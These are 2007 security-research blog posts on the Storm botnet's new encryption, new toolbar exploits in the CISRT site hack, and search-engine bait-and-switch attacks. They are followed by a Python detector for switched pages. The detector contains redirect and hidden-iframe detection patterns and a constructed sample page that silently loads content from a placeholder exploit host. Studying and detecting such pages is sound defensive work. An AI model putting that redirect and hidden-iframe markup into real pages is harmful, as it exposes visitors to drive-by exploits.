Wednesday, October 17, 2007

And the other shoe drops ...

Hi folks,

Our respected colleague, Joe Stewart, has noticed that Storm is now using encryption (albeit trivial) to communicate with its peers. What this means is that Storm bots can only communicate with other Storm bots that know that key. He speculates that this might be a precursor to selling off chunks of the botnet!

This fits perfectly with what we noticed: Storm had been ... vigorous ... but was now quiet. It felt, to us, that they were planning or changing something, and this would make perfect sense.

What this means to everyone is that we can look forward to even _increased_ Storm botnet activity, as other groups try to use it for their various and nefarious purposes.

Interesting times, folks.

Cheers

Roger


Friday, October 05, 2007

Waiting for the other shoe to drop

Hi folks,

This has been a really busy couple of weeks with hacked websites, new exploits, and improved encryption all over the place... we see most of the different groups working hard with the exception of the Storm guys.

Given how active they've been in the past, creating new lure pages every few days, sending huge amounts of spam, and sometimes creating new versions of their bots every few minutes, one has to wonder where they are.

It'd be nice to think they've given up, and got legit jobs, but one has to wonder if this is simply the proverbial calm before the (new) Storm.

Cheers

Roger


Wednesday, October 03, 2007

CISRT hack

Hi folks,

The most interesting part of this story has been poorly reported, as far as we can see, and that is that at least two of the many exploits being fired by the exploit servers in this hack are brand new! (0-days by some definitions, but probably more correctly Undercover Exploits)

One exploit impacts the Baidu Soba searchbar (apparently Baidu is a popular Chinese search engine, and they make a searchbar), which isn't going to impact non-Chinese users too much, but given that CISRT is the Chinese Internet Security Response Team, there's a fair chance it got a bunch of local victims before it was cleaned up.

The second new exploit seemingly targets another third-party toolbar. It's not 100% clear at this point, but the CLSID seems to be the OcSearchAssistant (spyware) searchbar. This is kind of funny, because it means it was targeting stuff that was probably installed by slightly nefarious means in the first place. I thought there was honor among thieves.

These bring to four the number of new third-party DLL exploits seen in use for the first time in just about one month. It seems an idea that is Catching On (tm).

The third under-reported side to this is the sheer complexity of the encryption being used to obfuscate the exploits. We have still not decrypted some of them, so there could well be more surprises to be found.

Cheers

Roger

Tuesday, October 02, 2007

More google stuff

Hi folks,

Here is a video we made some time ago and only recently decided to publish, mostly because some other folk have noticed it too. It's called Playing Bait and Switch with the search engines. Basically what happens is that the Bad Guys create a new website and load it up with pages of keywords ... some porno, some startlingly innocent. They give it a week or so to allow all the search bots to find and index them, and then switch it out to either an exploit or a social engineering trick.

The result is that really innocent searches take unwary users to really dangerous places.

Cheers

Roger
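The bait-and-switch described above leaves a detectable trace: the text a search engine indexed no longer matches what the page serves. As an added example (not code from the original post, nor from any lab tool), here is a small check that a reputation crawler could run against a stored index-time snapshot and a fresh fetch. The two sample pages, the `exploit.invalid` hostnames and the list of switch indicators are all constructed for this example.

```python
import difflib
import re
from html.parser import HTMLParser

# Markup that commonly replaces the keyword pages once the switch happens.
# Constructed indicator list for this example; tune it to your own telemetry.
SWITCH_PATTERNS = [
    re.compile(r'<meta[^>]+http-equiv=["\']?refresh', re.I),   # meta redirect
    re.compile(r'<iframe[^>]+(width|height)=["\']?0', re.I),   # hidden iframe
    re.compile(r'window\.location\s*=', re.I),                 # script redirect
]


class _TextExtractor(HTMLParser):
    """Collect the text a search bot would index, ignoring script/style bodies."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def visible_words(html):
    """Lower-cased word tokens of the page's visible text."""
    parser = _TextExtractor()
    parser.feed(html)
    return re.findall(r"\w+", " ".join(parser.parts).lower())


def content_similarity(indexed_html, live_html):
    """0.0 .. 1.0 similarity of the visible text at index time vs. now."""
    a, b = visible_words(indexed_html), visible_words(live_html)
    return difflib.SequenceMatcher(None, a, b, autojunk=False).ratio()


def detect_bait_and_switch(indexed_html, live_html, threshold=0.5):
    """Flag a page whose indexed content vanished and was replaced by redirect markup."""
    sim = content_similarity(indexed_html, live_html)
    hits = [p.pattern for p in SWITCH_PATTERNS if p.search(live_html)]
    return {
        "similarity": round(sim, 3),
        "switch_indicators": hits,
        "flagged": sim < threshold and bool(hits),
    }


# Constructed sample: what the crawler saw during the week the site was "innocent".
INDEXED_SNAPSHOT = """<html><head><title>Free recipes, knitting patterns, puppy photos</title></head>
<body><h1>Free recipes and knitting patterns</h1>
<p>chocolate cake recipe, easy knitting pattern scarf, cute puppy photos,
homework help algebra, birthday party ideas, garden tips tomatoes</p></body></html>"""

# Constructed sample: the same URL after the switch (placeholder .invalid hosts).
LIVE_PAGE = """<html><head><title>Loading</title>
<meta http-equiv="refresh" content="0;url=http://exploit.invalid/in.cgi?3">
</head><body><iframe src="http://exploit.invalid/pdf.php" width="0" height="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    print(detect_bait_and_switch(INDEXED_SNAPSHOT, INDEXED_SNAPSHOT))
    print(detect_bait_and_switch(INDEXED_SNAPSHOT, LIVE_PAGE))
```

The check deliberately requires both signals, a collapse in textual similarity and redirect-style markup, before flagging, so that an ordinary site redesign (text changes, no hidden iframe) is not reported; a crawler that wants earlier warning could log the similarity drop alone as a lower-severity event.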
